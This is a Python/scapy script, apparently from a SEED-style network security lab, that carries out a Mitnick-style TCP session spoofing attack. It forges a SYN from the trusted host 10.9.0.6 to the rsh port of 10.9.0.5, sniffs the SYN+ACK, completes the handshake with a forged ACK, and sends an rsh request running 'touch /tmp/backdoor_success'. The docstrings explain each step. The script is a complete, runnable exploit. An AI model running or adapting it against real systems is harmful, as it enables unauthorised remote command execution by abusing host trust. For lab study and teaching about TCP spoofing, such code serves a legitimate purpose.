#!/usr/bin/python3
from scapy.all import *
import sys
# IP Addresses
# X-Terminal: the target whose rsh service (X_PORT) receives the spoofed connection.
X_IP: str = "10.9.0.5"
# Host the attacker impersonates: every spoofed packet carries this as its
# source address, and nothing is ever sent *to* it. Presumably the server the
# X-Terminal trusts for rsh -- confirm against the lab setup.
SRV_IP: str = "10.9.0.6"

# Ports
# rsh ("shell") service port on the X-Terminal.
X_PORT: int = 514
# Source port of the spoofed client connection (a port below 1024, which the
# rsh convention requires of trusted clients -- verify against the target's rshd).
SRV_PORT: int = 1023
# Number placed in the first field of the rsh request; in the rsh protocol this
# is the port the server connects back to for stderr.
SECOND_PORT: int = 9090
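def rsh_request_payload(stderr_port: int, client_user: str, server_user: str, command: str) -> bytes:
    """Encode an rsh request as four NUL-terminated fields.

    This is the layout the original script built inline: the port the rsh
    server should connect back to for stderr, the client-side user name, the
    server-side user name and the command line (BSD rsh convention -- verify
    against the target's rshd if in doubt). Text is UTF-8 encoded, which is
    what scapy did implicitly when the str payload was appended to the TCP
    layer; returning bytes makes that explicit.

    Args:
        stderr_port: port number sent as the first field.
        client_user: user name claimed for the (spoofed) client side.
        server_user: user name the command should run as on the server.
        command: command line for the rsh server to execute.

    Returns:
        The raw bytes to place after the TCP header.
    """
    fields = (str(stderr_port), client_user, server_user, command)
    return b"".join(field.encode("utf-8") + b"\x00" for field in fields)


def mitnick_attack(iface: str = "br-63cae30f0395", timeout: float = 5) -> bool:
    """Run a TCP sequence-spoofing (Mitnick-style) attack on the X-Terminal.

    The attacker impersonates the trusted host SRV_IP towards X_IP:
      1. send a spoofed SYN from SRV_IP:SRV_PORT to X_IP:X_PORT;
      2. sniff the SYN+ACK that X_IP sends back towards SRV_IP;
      3. answer it with a spoofed ACK, completing the handshake;
      4. push an rsh request carrying the command on that connection.

    Args:
        iface: interface to sniff on. The bridge name that used to be
            hard-coded is kept as the default, so existing callers see no
            change.
        timeout: seconds to wait for the SYN+ACK before giving up.

    Returns:
        True when the SYN+ACK was seen and the ACK plus rsh request were
        sent; False when no SYN+ACK arrived within ``timeout`` (the
        original version failed silently in that case).

    NOTE(review): the attack only works while the real host at SRV_IP cannot
    answer the SYN+ACK with a RST (it is down or SYN-flooded); this script
    does nothing to ensure that. It also never answers the connection that
    an rsh server presumably opens back to SRV_IP:SECOND_PORT for stderr,
    so whether the command actually runs depends on how the target's rshd
    handles that -- confirm in the lab.
    """
    print(f"Starting Mitnick Attack on {X_IP}...")

    # Step 1: spoofed SYN. We choose our own ISN; the X-Terminal's ISN is
    # read from its SYN+ACK below, so no sequence-number prediction is needed.
    my_seq = 0x12345678
    syn = IP(src=SRV_IP, dst=X_IP) / TCP(sport=SRV_PORT, dport=X_PORT, flags="S", seq=my_seq)
    print(f"Step 1: Sending spoofed SYN from {SRV_IP}:{SRV_PORT} to {X_IP}:{X_PORT}")
    send(syn, verbose=0)

    # Set by spoof_ack once the SYN+ACK has been answered. It drives
    # stop_filter so the capture ends only then, instead of on the first packet
    # that merely matches the BPF filter (with count=1 a RST from X_IP to
    # SRV_PORT would have ended the sniff before the SYN+ACK arrived).
    handled = False

    def spoof_ack(pkt):
        """Steps 2-4: on the SYN+ACK for our spoofed SYN, ACK it and send the rsh request."""
        nonlocal handled
        # Only the SYN+ACK belonging to our spoofed connection is interesting.
        is_syn_ack = pkt.haslayer(TCP) and pkt[TCP].flags == "SA"
        if not (is_syn_ack and pkt[IP].src == X_IP and pkt[TCP].dport == SRV_PORT):
            return None

        their_seq = pkt[TCP].seq
        print(f"Step 2: Received SYN+ACK from X-Terminal (Seq: {their_seq})")

        # Step 3: the ACK consumes no sequence space, so both the ACK and the
        # data segment below start at my_seq + 1 and acknowledge their ISN + 1.
        next_seq = my_seq + 1
        next_ack = their_seq + 1
        ack_pkt = IP(src=SRV_IP, dst=X_IP) / TCP(
            sport=SRV_PORT, dport=X_PORT, flags="A", seq=next_seq, ack=next_ack
        )
        print("Step 3: Sending spoofed ACK to complete handshake")
        send(ack_pkt, verbose=0)

        # Step 4: rsh request on the connection X_IP now considers established.
        data = rsh_request_payload(SECOND_PORT, "seed", "seed", "touch /tmp/backdoor_success")
        rsh_pkt = IP(src=SRV_IP, dst=X_IP) / TCP(
            sport=SRV_PORT, dport=X_PORT, flags="PA", seq=next_seq, ack=next_ack
        ) / data
        print("Step 4: Sending rsh data: touch /tmp/backdoor_success")
        send(rsh_pkt, verbose=0)

        handled = True
        # sniff() prints whatever prn returns, so return None rather than a bool.
        return None

    # The BPF filter is deliberately loose (any TCP from X_IP to SRV_PORT);
    # spoof_ack performs the exact SYN+ACK check and stop_filter ends the
    # capture only after it has fired.
    sniff(
        iface=iface,
        filter=f"tcp and src host {X_IP} and dst port {SRV_PORT}",
        prn=spoof_ack,
        stop_filter=lambda _pkt: handled,
        timeout=timeout,
    )

    if not handled:
        print(f"No SYN+ACK from {X_IP} within {timeout}s; attack aborted "
              f"(check that {SRV_IP} cannot answer with a RST)")
    return handled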
if __name__ == "__main__":
    # Script entry point. scapy's send()/sniff() need raw-socket privileges,
    # so this is expected to run as root (or with CAP_NET_RAW).
    mitnick_attack()